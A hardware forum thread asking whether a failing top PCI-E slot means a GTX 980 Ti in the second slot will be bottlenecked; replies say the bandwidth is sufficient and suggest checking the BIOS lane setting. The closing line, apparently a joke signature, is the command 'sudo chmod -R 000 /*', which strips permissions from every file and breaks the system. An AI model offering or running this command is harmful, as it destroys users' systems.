Dead PCI-E Slot, Will Switching Slots Bottleneck Me?

Hey guys, I have an Asus p8Z77-M motherboard. It has at least 2 PCI-E 16x slots however the top slot closest to the CPU is either dead or failing due to it causing driver crashes and overall a ton of issues that were solved by switching slots. Currently I have a GTX 660 and I have yet to see any performance decrease with this slot being dead/ failing for over a year now. I am getting an EVGA GTX 980ti for the holiday over the weekend and I was wondering if this slot will have any negative impact on the 980ti since it is a massively higher performing card. Any help would be appreciated. I tried tom find the speed that the lane runs at online but have found no luck.

You should be totally fine

Even if it was a 8x slot it would still tame a 980ti with marginal differences

Most likely not. Graphics cards still don't get bottlenecked by PCIe 2.0 x8 levels of bandwidth :P

Awesome! Thank you I appreciate the reply :D

Make sure it's set to 8x or 16x speed in the bios though, it could be set to x4 by default.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
